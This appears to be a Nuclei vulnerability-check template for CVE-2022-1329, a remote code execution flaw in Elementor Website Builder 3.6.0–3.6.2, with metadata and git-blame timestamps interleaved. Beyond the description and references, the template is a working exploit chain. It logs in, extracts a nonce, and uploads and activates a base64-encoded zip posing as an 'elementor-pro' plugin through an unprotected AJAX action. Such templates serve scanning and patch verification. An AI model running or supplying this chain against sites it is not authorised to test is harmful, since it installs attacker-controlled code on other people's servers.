2023-03-18 22:07:09 +00:00
id : CVE-2022-1329
info :
2023-03-31 14:34:54 +00:00
name : Elementor Website Builder - Remote Code Execution
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : high
description : |
2023-03-31 13:21:07 +00:00
The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 11:59:08 +00:00
remediation : Fixed in version 3.6.3
2023-03-18 22:07:09 +00:00
reference :
- https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/
- https://wordpress.org/plugins/elementor/
2023-03-20 07:05:15 +00:00
- https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php
2023-03-31 13:21:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1329
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2022-1329
2023-07-11 19:49:27 +00:00
cwe-id : CWE-434,CWE-862
2024-01-14 13:49:27 +00:00
epss-score : 0.96427
epss-percentile : 0.99471
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : elementor
product : website_builder
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/ HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea
--336b29d7aee0463d8b651303eab505ea
Content-Disposition : form-data; name="action"
elementor_upload_and_install_pro
--336b29d7aee0463d8b651303eab505ea
Content-Disposition : form-data; name="_nonce"
{{nonce}}
--336b29d7aee0463d8b651303eab505ea
Content-Disposition : form-data; name="fileToUpload"; filename="{{randstr}}.zip"
{{base64_decode("UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=")}}
--336b29d7aee0463d8b651303eab505ea--
- |
GET /index.php?activate=1 HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body_4
words :
- '5f9bc5edd71c78284dabe630df8cd71d'
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : nonce
group : 1
regex :
- 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
internal : true
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502207390707237e3ba6a179671519cf1798e98ea2a888336f3601b680b4c7c9f255e0221008306779b3ccc14bdadd26c1a72350bd22df65c438d20fa0bd93382f39e31d5dd:922c64590222798bb761d5b6d8e72950